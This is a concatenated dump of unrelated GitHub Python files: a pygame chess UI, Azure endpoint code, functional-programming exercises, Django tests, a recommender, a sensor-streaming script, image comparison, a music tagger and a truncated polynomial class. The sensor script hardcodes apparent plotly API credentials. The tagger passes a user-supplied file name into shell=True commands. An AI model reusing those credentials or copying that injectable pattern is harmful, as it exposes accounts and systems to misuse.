self.portret_name_rect.top + confirm_button_gap], Path(self.sound_pack + \"click.wav\"),\"Confirm\",self.buttons_font, self.ui_black, self.ui_white)\n\n # Ui state\n self.PLAY_STATE = \"PLAY\"\n self.SETTINGS_STATE = \"SETTINGS\"\n self.ui_state = None\n self.select_color = piece.WHITE\n self.ingame = False\n\n # Game stuff\n self.ui_promotion_pos = None\n self.ui_promotion_size = self.board.square_size\n self.ui_promotion_buttons = button.ButtonHandler([])\n\n\n # Delta time\n self.dt = 0\n self.last_time = time.time()\n\n # Is [-1,-1] if player hasn't clicked this frame, else is click position on surface\n self.click_pos = [-1,-1]\n\n # Board underlay\n self.board_underlay_size = [40,40]\n self.board_underlay = pygame.Rect([self.board_offset[0]- round(self.board_underlay_size[0]/2), self.board_offset[1]- round(self.board_underlay_size[1]/2)],[(self.board.square_size[0] * 8) + self.board_underlay_size[0], (self.board.square_size[1] * 8)+self.board_underlay_size[1]])\n\n def update_main_ui(self):\n # Play pressed:\n if self.main_ui_buttons.buttons[0].pressed:\n self.main_ui_buttons.buttons[0].pressed = False\n self.ui_state = self.PLAY_STATE\n # Settings pressed:\n elif self.main_ui_buttons.buttons[1].pressed:\n self.main_ui_buttons.buttons[1].pressed = False\n self.ui_state = self.SETTINGS_STATE\n # Exit\n elif self.main_ui_buttons.buttons[2].pressed:\n self.quit()\n\n def update_arrow_buttons(self):\n self.arrow_buttons.updates(self.click_pos)\n # Left\n if self.arrow_buttons.buttons[0].pressed == True:\n self.arrow_buttons.buttons[0].pressed = False\n self.player_index -= 1\n if self.player_index <= -self.total_players:\n self.player_index = 0\n # Right\n if self.arrow_buttons.buttons[1].pressed == True:\n self.arrow_buttons.buttons[1].pressed = False\n self.player_index += 1\n if self.player_index >= self.total_players:\n self.player_index = 0\n\n def update_confirm_button(self):\n self.confirm_button.update(self.click_pos)\n #\n if 
self.confirm_button.pressed:\n self.confirm_button.pressed = False\n if self.ui_state == self.PLAY_STATE:\n if self.select_color == piece.WHITE:\n self.confirm_button.change_font_color(self.ui_white)\n self.confirm_button.change_bg_color(self.ui_black)\n self.active_players[0] = self.players[self.player_index]\n\n elif self.select_color == piece.BLACK:\n self.confirm_button.change_font_color(self.ui_black)\n self.confirm_button.change_bg_color(self.ui_white)\n self.active_players[1] = self.players[self.player_index]\n\n self.select_color += 1\n if self.select_color > 1:\n self.select_color = 0\n self.ui_state = None\n self.ingame = True\n\n\n def draw_main_ui(self):\n self.main_ui_buttons.draws(self.surface)\n\n if self.ui_state == self.PLAY_STATE:\n self.update_arrow_buttons()\n self.update_confirm_button()\n\n pygame.draw.rect(self.surface, self.ui_secondary, self.other_ui_rect)\n self.surface.blit(self.players[self.player_index].image, self.portret_rect)\n self.portret_name_rect.x = self.other_ui_rect.left + texture.center_x(self.players[self.player_index].name_surf, self.other_ui_rect.size)\n pygame.draw.rect(self.surface, self.ui_bg, self.portret_underlay)\n self.surface.blit(self.players[self.player_index].image, self.portret_rect)\n self.surface.blit(self.players[self.player_index].name_surf, self.portret_name_rect)\n self.arrow_buttons.draws(self.surface)\n self.confirm_button.draw(self.surface)\n\n\n\n\n\n\n elif self.ui_state == self.SETTINGS_STATE:\n pass\n\n def is_click_on_board(self) -> bool:\n if self.click_pos[0] >= self.board_offset[0] and self.click_pos[1] >= self.board_offset[1]:\n if self.click_pos[0] <= self.board_bottomright[0] and self.click_pos[1] <= self.board_bottomright[1]:\n return True\n return False\n def update_board(self):\n if isinstance(self.active_players[self.board.board_data.active], player.Human):\n # If click is on board\n if self.is_click_on_board():\n # Please forgive me god\n pos = [-1,-1]\n for i in range(0, self.click_pos[0] - self.board_offset[0], self.board.square_size[0]):\n pos[0] += 1\n for j in range(0, self.click_pos[1] - self.board_offset[1], self.board.square_size[1]):\n pos[1] += 1\n\n self.active_players[self.board.board_data.active].touch(self.board.board_data, engine.Coordinate(pos[1], pos[0]))\n else:\n move = self.active_players[self.board.board_data.active].move(self.board.board_data)\n if move != None:\n self.board.board_data.apply_move(move)\n\n\n def maingame(self):\n self.main_ui_buttons.updates(self.click_pos)\n self.update_main_ui()\n if self.ingame:\n self.update_board()\n\n\n # Drawing loop\n self.surface.fill(self.ui_bg)\n pygame.draw.rect(self.surface, self.ui_secondary, self.board_underlay)\n\n selected = None\n self.ui_promotion_buttons.buttons = []\n legal_moves = []\n # \n if isinstance(self.active_players[self.board.board_data.active], player.Human):\n # \n if self.active_players[self.board.board_data.active].selected != None:\n selected = [self.active_players[self.board.board_data.active].selected]\n legal_moves = self.active_players[self.board.board_data.active].legal_moves\n \n # Pop up ui for promotion\n if self.active_players[self.board.board_data.active].promotion != None:\n # Create the buttons\n self.ui_promotion_pos = [700,200]\n for piece in range(0, 4):\n self.ui_promotion_buttons.buttons.append(ImageButton(self.ui_promotion_size, [self.ui_promotion_pos[0], self.ui_promotion_pos[1] +self.ui_promotion_size[1]*piece], self.click_sound, 
self.board.texture_pack.pieces[self.board.board_data.active][piece]))\n\n \n\n # Ui buttons\n for i in range(0,len(self.ui_promotion_buttons.buttons)):\n self.ui_promotion_buttons.buttons[i].update(self.click_pos)\n if self.ui_promotion_buttons.buttons[i].pressed:\n self.active_players[self.board.board_data.active].tell_type(self.board.board_data, i)\n break;\n \n \n \n \n self.board.draw(self.surface, ((self.board_offset, self.board_offset)), selected, legal_moves)\n self.surface.blit(self.title_surface, self.title_pos)\n \n \n self.ui_promotion_buttons.draws(self.surface)\n self.draw_main_ui()\n\n\n\n\n\n def update(self):\n self.state_to_function[self.state]()\n\n def screen_to_window(self):\n self.win.blit(pygame.transform.scale(\n self.surface, self.win_size), (0, 0))\n\n def start(self):\n while True:\n self.click_pos = [-1,-1]\n self.dt = time.time() - self.last_time\n self.last_time = time.time()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n self.click_pos = button.convert_window_pos(event.pos, self.win_size, self.surface_size)\n\n self.update()\n self.screen_to_window()\n pygame.display.flip()\n\n def quit(self):\n pygame.quit()\n sys.exit()\n","repo_name":"SleepingNerd/chess","sub_path":"scenemanager.py","file_name":"scenemanager.py","file_ext":"py","file_size_in_byte":14236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"28561197564","text":"__author__ = 'Yifu Huang'\n\nimport sys\n\nsys.path.append(\"..\")\nfrom hackathon.azureformation.utility import (\n find_unassigned_endpoints,\n add_endpoint_to_network_config,\n delete_endpoint_from_network_config,\n)\nfrom hackathon.constants import (\n AZURE_RESOURCE_TYPE,\n AVMStatus,\n)\nfrom hackathon import Component\n\n\nclass Endpoint(Component):\n \"\"\"\n Endpoint is used for dynamic management of azure endpoint on azure cloud service\n \"\"\"\n ERROR_RESULT = None\n TICK = 5\n LOOP = 200\n\n def __init__(self, service):\n self.service = service\n\n def assign_public_endpoints(self, cloud_service_name, deployment_slot, virtual_machine_name, private_endpoints):\n \"\"\"\n Assign public endpoints of cloud service for private endpoints of virtual machine\n Return None if failed\n :param cloud_service_name:\n :param deployment_slot:\n :param virtual_machine_name:\n :param private_endpoints: a list of int or str\n :return: public_endpoints: a list of int\n \"\"\"\n self.log.debug('private_endpoints: %s' % private_endpoints)\n assigned_endpoints = self.service.get_assigned_endpoints(cloud_service_name)\n self.log.debug('assigned_endpoints: %s' % assigned_endpoints)\n if assigned_endpoints is None:\n return self.ERROR_RESULT\n # duplicate detection for public endpoint\n public_endpoints = find_unassigned_endpoints(private_endpoints, assigned_endpoints)\n self.log.debug('public_endpoints: %s' % public_endpoints)\n deployment_name = self.service.get_deployment_name(cloud_service_name, deployment_slot)\n network_config = self.service.get_virtual_machine_network_config(cloud_service_name,\n deployment_name,\n virtual_machine_name)\n # compose new network config to update\n new_network_config = add_endpoint_to_network_config(network_config, public_endpoints, private_endpoints)\n if new_network_config is None:\n return self.ERROR_RESULT\n try:\n result = self.service.update_virtual_machine_network_config(cloud_service_name,\n deployment_name,\n virtual_machine_name,\n 
new_network_config)\n except Exception as e:\n self.log.error(e)\n return self.ERROR_RESULT\n if not self.service.wait_for_async(result.request_id, self.TICK, self.LOOP):\n self.log.error('wait for async fail')\n return self.ERROR_RESULT\n if not self.service.wait_for_virtual_machine(cloud_service_name,\n deployment_name,\n virtual_machine_name,\n self.TICK,\n self.LOOP,\n AVMStatus.READY_ROLE):\n self.log.error('%s [%s] not ready' % (AZURE_RESOURCE_TYPE.VIRTUAL_MACHINE, virtual_machine_name))\n return self.ERROR_RESULT\n return public_endpoints\n\n def release_public_endpoints(self, cloud_service_name, deployment_slot, virtual_machine_name, private_endpoints):\n \"\"\"\n Release public endpoints of cloud service according to private endpoints of virtual machine\n Return False if failed\n :param cloud_service_name:\n :param deployment_slot:\n :param virtual_machine_name:\n :param private_endpoints: a list of int or str\n :return:\n \"\"\"\n self.log.debug('private_endpoints: %s' % private_endpoints)\n deployment_name = self.service.get_deployment_name(cloud_service_name, deployment_slot)\n network_config = self.service.get_virtual_machine_network_config(cloud_service_name,\n deployment_name,\n virtual_machine_name)\n new_network_config = delete_endpoint_from_network_config(network_config, private_endpoints)\n if new_network_config is None:\n return False\n try:\n result = self.service.update_virtual_machine_network_config(cloud_service_name,\n deployment_name,\n virtual_machine_name,\n new_network_config)\n except Exception as e:\n self.log.error(e)\n return False\n if not self.service.wait_for_async(result.request_id, self.TICK, self.LOOP):\n self.log.error('wait for async fail')\n return False\n if not self.service.wait_for_virtual_machine(cloud_service_name,\n deployment_name,\n virtual_machine_name,\n self.TICK,\n self.LOOP,\n AVMStatus.READY_ROLE):\n self.log.error('%s [%s] not ready' % (AZURE_RESOURCE_TYPE.VIRTUAL_MACHINE, virtual_machine_name))\n return False\n return True","repo_name":"Fendoe/open-hackathon-o","sub_path":"open-hackathon-server/src/hackathon/azureformation/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73466292349","text":"''' use of filter function\n\n\ndef is_even(num):\n return num%2 == 0\nnumbers = [1,12,3,53,5,64,64,62,62,646,42,63246,464,634,6464,36,3464]\n\nevens = list(filter(is_even,numbers))\nprint(evens)\n\nvowels = ['a','e','i','o','u']\n\nstrings = ['a','a','s','k','j','d','f','o','a','i','w','e','u','f','k','l','p','e','i','f','j','s','d','k','l','f','j','d','s','k','l','f']\ndef is_vowel(alpha):\n return alpha in vowels\n \n\nresult = list(filter(is_vowel,strings))\n\nprint(result)\n\n'''\n\n\n''' use of lambda function \n\nnumbers = [1,12,3,53,5,64,64,62,62,646,42,63246,464,634,6464,36,3464]\nvowels = ['a','e','i','o','u']\nstrings = ['a','a','s','k','j','d','f','o','a','i','w','e','u','f','k','l','p','e','i','f','j','s','d','k','l','f','j','d','s','k','l','f']\n\n\n\neven_list = list(filter(lambda x:x%2==0, numbers))\nprint(even_list)\n\nvowel_list = list(filter(lambda a:a in vowels, strings))\nprint(vowel_list)\n\n\n\n'''\n\n''' use of map function\n\n\n# def is_onemore(num):\n# return num + 1\n\nnumbers = [1,2,3,4,55,6,6,545,2,532,252,56,62,6,7,8,6,4,3,2,4,56,7,9]\n\nplus_one = list(map(lambda x: x + 1,numbers))\nprint(plus_one)\n\n'''\n\n''' use of reduce function in adding more than 2 numbers\n'''\n#we 
have to import reduce from functools\nfrom functools import reduce\n\n# def add_all(a,b):\n# return a+b\nnumbers = [1,2,3,4,55,6,6,545,2,532,252,56,62,6,7,8,6,4,3,2,4,56,7,9]\n\nfinal = reduce(lambda a,b: a+b,numbers)\nprint(final)\n\n\n\n\n\n\n","repo_name":"asishraz/python_learning","sub_path":"filter_function.py","file_name":"filter_function.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5057796006","text":"from datetime import date\n\nimport pytest\n\nfrom .testapp.models import Book\n\n\n@pytest.mark.django_db\ndef test_save_cycle():\n Book.objects.create(data={'title': 'The Lord of the Rings', 'author': 'Tolkien'})\n b = Book.objects.first()\n b.clean()\n assert b.data['title'] == 'The Lord of the Rings'\n\n\n@pytest.mark.django_db\ndef test_custom_encoder():\n Book.objects.create(data={'title': 'The Lord of the Rings', 'date': date(1954, 7, 29)})\n b = Book.objects.first()\n b.clean()\n assert b.data['date'] == '1954-07-29'\n\n\n@pytest.mark.django_db\ndef test_default():\n Book.objects.create()\n b = Book.objects.first()\n b.clean()\n assert b.data['foo'] == 'bar'\n\n\n\"\"\"\n@pytest.mark.django_db\ndef test_nullable():\n Book.objects.create(data=None)\n b = Book.objects.first()\n b.clean()\n assert b.data is None\n\"\"\"\n","repo_name":"raphaelm/django-jsonfallback","sub_path":"tests/test_serialization.py","file_name":"test_serialization.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"6"} +{"seq_id":"74195823548","text":"from abc import ABC, abstractmethod\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.svm import SVC\n\n\nclass Recommender(ABC):\n def __init__(self, playlist_tracks, recommendations_pool):\n\n self.playlist_tracks = playlist_tracks\n self.disliked_tracks = []\n self.recommendations_pool = recommendations_pool\n self.current_recommendation = self.next()\n\n def like(self):\n self.next(True)\n\n def dislike(self):\n self.next(False)\n\n def current(self):\n return self.current_recommendation\n\n def next(self, like_current_recommendation=None):\n if like_current_recommendation:\n self.playlist_tracks.append(self.current_recommendation)\n if like_current_recommendation is False:\n self.disliked_tracks.append(self.current_recommendation)\n\n if self.recommendations_pool:\n self.current_recommendation = self.next_recommendation(\n like_current_recommendation)\n else:\n self.current_recommendation = None\n\n return self.current_recommendation\n\n @abstractmethod\n def next_recommendation():\n pass\n\n\nclass BaselineRecommender(Recommender):\n def next_recommendation(self, like_current_recommendation):\n return self.recommendations_pool.pop()\n\n\n# All songs in the playlist have target feature = True\n# All songs in the recommendation pool have target feature = False\n# Train classifier based on that.\nclass NaivePUClassifier(Recommender):\n def next_recommendation(self, like_current_recommendation):\n X_train = preprocessing.scale(\n pd.DataFrame(\n list([\n x['features']\n for x in (self.playlist_tracks + self.disliked_tracks +\n self.recommendations_pool)\n ])))\n\n X_predict = preprocessing.scale(\n pd.DataFrame(\n list([x['features'] for x in self.recommendations_pool])))\n\n y = pd.Series([True] * len(self.playlist_tracks) +\n [False] * len(self.disliked_tracks) +\n [False] * len(self.recommendations_pool))\n\n clf = SVC(gamma='auto', 
probability=True)\n clf.fit(X_train, y)\n predictions = clf.predict_proba(X_predict)[:, 1]\n\n recommendation_index = predictions.argmax()\n return self.recommendations_pool.pop(recommendation_index)\n\n\ndef initialize_recommender(playlist_tracks, recommendations_pool):\n global recommender\n recommender = NaivePUClassifier(playlist_tracks, recommendations_pool)\n\n\ndef get_recommendation():\n global recommender\n return recommender.current()\n\n\ndef like_recommendation():\n global recommender\n return recommender.like()\n\n\ndef dislike_recommendation():\n global recommender\n return recommender.dislike()\n","repo_name":"castdin/spotify-playlist-maker","sub_path":"server/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26794825211","text":"import time\nimport board\nimport busio\nimport adafruit_adxl34x\nimport numpy\nimport smbus\nimport datetime\n\nimport plotly.plotly as py# plotly library\nfrom plotly.graph_objs import Scatter, Layout, Figure # plotly graph objects\n\nusername = 'messay'\napi_key = 'aGWxBNUA1wgFnC8xkY66'\nstream_token = '8g0wx06s37'\n\npy.sign_in(username, api_key)\n\ntrace1 = Scatter(\n x=[],\n y=[],\n stream=dict(\n token=stream_token,\n maxpoints=200\n )\n)\n\n\n\nlayout = Layout(\n title='Raspberry Pi Streaming Sensor Data'\n)\n\nfig = Figure(data=[trace1], layout=layout)\n\nprint (py.plot(fig, filename='Raspberry Pi Streaming Example Values'))\n\nstream = py.Stream(stream_token)\nstream.open()\n\n\ni2c = busio.I2C(board.SCL, board.SDA)\nbus = smbus.SMBus(1)\n \n# For ADXL343\n#accelerometer = adafruit_adxl34x.ADXL343(i2c)\n# For ADXL345\naccelerometer = adafruit_adxl34x.ADXL345(i2c)\n \nwhile True:\n bus.write_byte_data(0x60, 0x26, 0x39)\n time.sleep(1)\n # MPL3115A2 address, 0x60(96)\n # Read data back from 0x00(00), 4 bytes\n # status, pres MSB1, pres MSB, pres LSB\n data = bus.read_i2c_block_data(0x60, 0x00, 4)\n # Convert the data to 20-bits\n pres = ((data[1] * 65536) + (data[2] * 256) + (data[3] & 0xF0)) / 16\n pressure = (pres / 4.0) / 1000.0\n # Output data to screen\n print (\"Pressure : %.2f kPa\" %pressure)\n \n #print(\"%f %f %f\" % accelerometer.acceleration)\n accelerometer_raw=accelerometer.acceleration\n accelerometer_magnitude=numpy.sqrt(numpy.square(accelerometer_raw[0])+numpy.square(accelerometer_raw[1])+numpy.square(accelerometer_raw[2]))\n print(\"Acceleration : %f\" %accelerometer_magnitude)\n #time.sleep(0.1)\n \n \n \n stream.write({'x': datetime.datetime.now(), 'y': accelerometer_magnitude})\n \n \n time.sleep(0.25) # delay between stream posts\n","repo_name":"tunchunairarko/canaryplay","sub_path":"accelerometer.py","file_name":"accelerometer.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72054413949","text":"import logging\n\nimport cv2\nimport numpy as np\nfrom skimage.measure import compare_ssim, compare_mse, compare_nrmse, compare_psnr\nfrom sklearn.preprocessing import MinMaxScaler\n\n\ndef image_similarity_measures(image_a, image_b):\n logger = logging.getLogger(__name__)\n\n result = {}\n\n # Align image_a to image_b\n # image_a, homography = img_registration(image_a, image_b)\n\n functions = [compare_mse, compare_nrmse, compare_psnr, compare_ssim]\n difference_image = None\n\n for function in functions:\n logger.info('Executing {}'.format(function.__name__))\n\n if 
function.__name__ == 'compare_ssim':\n            try:\n                gray_a = cv2.cvtColor(image_a, cv2.COLOR_BGR2GRAY)\n                gray_b = cv2.cvtColor(image_b, cv2.COLOR_BGR2GRAY)\n            # This should not be caught with an exception :), tif scaling\n            except cv2.error:\n                scaler = MinMaxScaler(copy=False, feature_range=(0, 255))\n                gray_a = scaler.fit_transform(image_a)\n                gray_b = scaler.fit_transform(image_b)\n\n            score, difference_image = function(gray_a, gray_b, full=True)\n            if score != 1.0:\n                difference_image = (difference_image * 255).astype(\"uint8\")\n            if np.isnan(score):\n                score = 'NaN'\n            result[function.__name__] = score\n        else:\n            score = function(image_a, image_b)\n            if score == float(\"inf\"):\n                score = \"infinity\"\n            result[function.__name__] = score\n\n    return result, difference_image\n\n\ndef img_registration(image_a, image_b):\n    # https://www.learnopencv.com/image-alignment-feature-based-using-opencv-c-python/\n    # Convert images to grayscale\n    im1Gray = cv2.cvtColor(image_a, cv2.COLOR_BGR2GRAY)\n    im2Gray = cv2.cvtColor(image_b, cv2.COLOR_BGR2GRAY)\n\n    # Detect ORB features and compute descriptors.\n    orb = cv2.ORB_create(500)\n    keypoints1, descriptors1 = orb.detectAndCompute(im1Gray, None)\n    keypoints2, descriptors2 = orb.detectAndCompute(im2Gray, None)\n\n    # Match features.\n    matcher = cv2.DescriptorMatcher_create(cv2.DESCRIPTOR_MATCHER_BRUTEFORCE_HAMMING)\n    matches = matcher.match(descriptors1, descriptors2, None)\n\n    # Sort matches by score\n    matches.sort(key=lambda x: x.distance, reverse=False)\n\n    # Remove not so good matches\n    numGoodMatches = int(len(matches) * 0.25)\n    matches = matches[:numGoodMatches]\n\n    # Draw top matches\n    #imMatches = cv2.drawMatches(image_a, keypoints1, image_b, keypoints2, matches, None)\n    #cv2.imwrite(\"matches.jpg\", imMatches)\n\n    # Extract location of good matches\n    points1 = np.zeros((len(matches), 2), dtype=np.float32)\n    points2 = np.zeros((len(matches), 2), dtype=np.float32)\n\n    for i, match in enumerate(matches):\n        points1[i, :] = keypoints1[match.queryIdx].pt\n        points2[i, :] = keypoints2[match.trainIdx].pt\n\n    # Find homography\n    h, _ = cv2.findHomography(points1, points2, cv2.RANSAC)\n    # Use homography\n    height, width, _ = image_b.shape\n    imbReg = cv2.warpPerspective(image_a, h, (width, height))\n    return imbReg, h\n","repo_name":"Open-EO/openeo-result-validation-engine","sub_path":"RuleEngine/Algorithms/image_funcs.py","file_name":"image_funcs.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"13951178040","text":"#!/usr/bin/python2.7\n\n# Things this program should do\n# use proper metadata (acoustid + musicbrainz)\n# add in album art (guess from file names?)\n# move, rename cue and log files\n# remove .m3u file, album dir if necessary\n# custom music directory\n\nimport acoustid\nimport argparse\nimport glob\nimport mimetypes\n#import musicbrainzngs as mb\nfrom mutagen import File\nimport re\nimport subprocess\nimport sys\n\nimport pprint\n\n''''\ncues = glob.glob(\"./*.cue\") #CUE and log files should also be moved\nlogs = glob.glob(\"./*.log\")\n'''\n\nargs = {\"rename\": False, \"move\": False, \"albumart\": False,\n        \"descriptionfile\": \"info.txt\", \"normalize\": False }\n\ndef sanitize_name(name):\n    \"\"\"Rename something to something more sensible.\"\"\"\n    return re.sub(\"[!@#$%^&*()~`]\", \"\", name).lower().replace(\" \", \"_\")\n\ndef convert_process_flacs(mask=\"*.flac\"):\n    \"\"\"Convert all files matching mask to flac and process at once.\n    mask - the 
string that matches the files (default: *.flac)\"\"\"\n    global args\n    if args[\"normalize\"]:\n        print(subprocess.check_output(\"flac -V8f --replay-gain \" + mask,\n            shell = True))\n    try:\n        subprocess.check_output(\"metaflac --set-tag-from-file=DESCRIPTION=\" +\n            args[\"descriptionfile\"] + \" *.flac\", shell = True)\n    except subprocess.CalledProcessError:\n        pass #no big deal\n\ndef ranged_input(min, max):\n    input = int(raw_input())\n    while input > max or input < min:\n        print(\"Input error: must be between \" + str(min) + \" and \" + str(max)\n            + \" inclusive\")\n        input = int(raw_input())\n    return input\n\ndef get_cover_and_code(albums, img): #this is not so bad atm\n    codes = [\"Other\", \"32x32 pixels 'file icon' (PNG only)\", \"Other file icon\",\n    \"Cover (front)\", \"Cover (back)\", \"Leaflet page\",\n    \"Media (e.g. label side of CD)\", \"Lead artist/lead performer/soloist\",\n    \"Artist/performer\", \"Conductor\", \"Band/Orchestra\", \"Composer\",\n    \"Lyricist/text writer\", \"Recording Location\", \"During recording\",\n    \"During performance\", \"Movie/video screen capture\",\n    \"A bright coloured fish\", \"Illustration\", \"Band/artist logotype\",\n    \"Publisher/Studio logotype\"]\n    for index, item in enumerate(albums):\n        print(str(index) + \": \" + str(item))\n    print(\"Enter number of album with cover {0} (-1 for none):\".format(img))\n    album = ranged_input(-1, len(albums) - 1)\n    code = None\n    if(album > -1):\n        for index, item in enumerate(codes):\n            print(str(index) + \": \" + item)\n        print(\"Enter description code: \")\n        code = ranged_input(0, len(codes) - 1)\n    return [album, code]\n\ndef add_album_art(imgcode, img, albums):\n    \"\"\"Associate img with the tracks associated with that album as shown by\n    albums according to the rules in imgcode.\"\"\"\n    \n\ndef process():\n    \"\"\"Process all tracks in the current directory.\"\"\"\n    global args\n    \n    tracks = glob.glob(\"./*.flac\") #All compatible audio files\n    tracks.extend(glob.glob(\"./*.mp3\"))\n    tracks.extend(glob.glob(\"./*.ogg\"))\n    tracks.extend(glob.glob(\"./*.wav\"))\n    albums = {}\n\n    flacs_normalized = False;\n    wavs_normalized = False;\n    oggs_normalized = False;\n\n    if False:\n        mb.set_useragent(\"Autotagger\", \".1\", \"plasmasheep@gmail.com\")\n    \n    if(len(tracks) == 0):\n        print(\"No compatible audio files found. 
Please use flac, mp3, or ogg.\")\n sys.exit()\n \n for track in tracks:\n print(\"Processing: \" + track)\n audio = File(track, easy=True)\n filetype = mimetypes.guess_type(track)[0]\n suffix = mimetypes.guess_extension(filetype)\n try:\n if audio[\"album\"][0] not in albums:\n albums[audio[\"album\"][0]] = []\n print(\"Detected new album: \" + audio[\"album\"][0])\n albums[audio[\"album\"][0]].append(track)\n except KeyError:\n print(\"This file has no album.\")\n \n if suffix == \".flac\":\n print(\"FLAC file detected\")\n if flacs_normalized is False:\n print(\"Processing all FLAC files...\")\n convert_process_flacs()\n flacs_normalized = True;\n else:\n print(\"FLACs already processed\")\n \n if suffix == \".ogg\":\n print(\"OGG file detected\")\n if oggs_normalized is False:\n print(\"Processing all OGG files...\")\n print(subprocess.check_output(\"vorbisgain -a *.ogg\",\n shell = True))\n oggs_normalized = True\n else:\n print(\"OGGs already processed\")\n\n if suffix == \".wav\":\n print(\"WAV file detected\")\n if wavs_normalized is False:\n print(\"Processing all WAV files...\")\n convert_process_flacs(\"*.wav\")\n wavs_normalized = True\n else:\n print(\"WAVs already processed\")\n #WAV files will become flac files, update track accordingly\n track = track[:-4] + \".flac\"\n \n if suffix == \".mp3\":\n print(\"MP3 file detected\")\n if args[\"normalize\"]: #TODO: this does not handle album norm\n print(subprocess.check_output([\"lame\", \"--replaygain-accurate\",\n track]))\n subprocess.call([\"mv\", track + \".mp3\", track])\n #print subprocess.check_output([\"id3v2\", \"-C\", track])\n #print subprocess.check_output([\"id3v2\", \"--delete-v1\", track])\n\n '''if grabmeta:\n fingerprint = acoustid.fingerprint_file(track)\n result = acoustid.lookup(\"ZKTsCHXl\", fingerprint[1], fingerprint[0])\n look = mb.get_release_by_id(result[\"results\"][0][\"recordings\"][0][\"id\"])'''\n\n if args[\"rename\"]:\n try:\n newname = '{:0>2}'.format(audio[\"tracknumber\"][0]) + \"-\" + \\\n sanitize_name(audio[\"title\"][0])\n print(subprocess.check_output(['mv', \"-v\", track,\n newname + suffix]))\n track = newname + suffix\n except TypeError:\n print(\"No metadata readable, cannot rename with track info.\")\n print(subprocess.check_output([\"mv\", \"-v\", track,\n sanitize_name(track)]))\n track = sanitize_name(track)\n \n if args[\"move\"]:\n try:\n newdir = \"/home/user/music/\" + \\\n sanitize_name(audio[\"artist\"][0]) + \"/\" + \\\n sanitize_name(audio[\"album\"][0]) + \"/\"\n subprocess.call([\"mkdir\", \"-p\", newdir])\n print(subprocess.check_output(['mv', \"-v\", track,\n newdir + track]))\n except TypeError:\n print(\"No metadata readable, cannot move.\")\n\n print(\"\")\n\n if args[\"albumart\"]:\n pics = glob.glob(\"./*.png\") #Image files\n pics.extend(glob.glob(\"./*.jpg\"))\n pics.extend(glob.glob(\"./*.jpeg\"))\n pics.extend(glob.glob(\"./*.gif\"))\n print(str(len(pics)) + \" images found.\")\n if(len(pics) > 0):\n #Convert albums into a more useful format:\n #{\"album1\":[\"track1\", \"track2\"], \"album2\":[\"track3\"]} --->\n #[{\"album1\":[\"track1\", \"track2\"]}, {\"album2\":[\"track3\"]}]\n #We can access albums by numbers this way\n albumlist = []\n for album, tracks in albums.iteritems():\n albumlist.append({album: tracks})\n for pic in pics:\n #For each pic, associate with an album, associate with a type,\n #then tag all files with that album\n print(\"Image: \" + pic)\n arts = get_cover_and_code(albumlist, pic)\n add_album_art(arts, pic, albums)\n \n else:\n 
print(\"No images found, cannot add album art.\") #TODO: online art\n \ndef main(argv): #Maybe make this take a list of files?\n global args\n parser = argparse.ArgumentParser(\n description = \"Import files in the current directory.\")\n parser.add_argument(\"-r\", \"--rename\", action=\"store_true\",\n help=\"Rename the files.\")\n parser.add_argument(\"-m\", \"--move\", action=\"store_true\",\n help=\"Move the files to the music directory.\")\n parser.add_argument(\"-a\", \"--albumart\", action=\"store_true\",\n help=\"Set album art as metadata.\")\n parser.add_argument(\"-n\", \"--normalize\", action=\"store_true\",\n help=\"Normalize tracks with ReplayGain.\")\n parser.add_argument(\"-d\", \"--descriptionfile\", action=\"store\",\n default=\"info.txt\", help=\"Which file to use for the DESCRIPTION tag.\")\n args = vars(parser.parse_args(argv))\n process()\n\nif(__name__ == \"__main__\"):\n main(sys.argv[1:])","repo_name":"abendebury/soundboy","sub_path":"autotag.py","file_name":"autotag.py","file_ext":"py","file_size_in_byte":8748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"41058257046","text":"class Poly:\r\n \r\n def __init__(self,*terms):\r\n # __str__ uses the name self.terms for the dictionary of terms\r\n # So __init__ should build this dictionary from terms\r\n self.terms = {}\r\n \r\n # Fill in the rest of this method, using *terms to intialize self.terms\r\n for x in terms:\r\n assert type(x[0]) is float or type(x[0]) is int, (\"Poly.__init__: illegal coefficient in\" + str(x) + \".\")\r\n assert type(x[1]) is int and x[1] >= 0, (\"Poly.__init__: illegal power in: \" + str(x) + \".\") \r\n assert x[1] not in self.terms, \"Poly.__init__: power {} is repeated.\".format(x[1])\r\n if x[0] != 0:\r\n self.terms[x[1]] = x[0]\r\n \r\n # I have written str(...) because it is used in the bsc.txt file and\r\n # it is a bit subtle to get correct. Notice that it assumes that\r\n # every Poly object stores a dict whose keys are powers and whose\r\n # associated values are coefficients. This function does not depend\r\n # on any other method in this class being written correctly. 
